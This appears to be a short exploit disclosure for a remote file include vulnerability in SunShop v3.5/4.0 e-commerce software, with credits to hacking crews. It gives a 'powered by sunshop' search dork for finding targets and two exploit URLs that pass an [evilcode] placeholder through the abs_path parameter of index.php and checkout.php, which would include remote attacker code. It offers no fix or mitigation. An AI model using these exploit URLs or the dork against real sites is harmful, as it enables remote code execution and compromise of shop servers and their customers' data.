sunshop 4 (index.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts       : SunShop v3.5/4.0
# Discovered By : irvian
# scripts site  : http://www.turnkeywebtools.com/sunshop/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork          : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:

Exploit: www.target.com/index.php?abs_path=[evilcode]
         www.target.com/checkout.php?abs_path=[evilcode]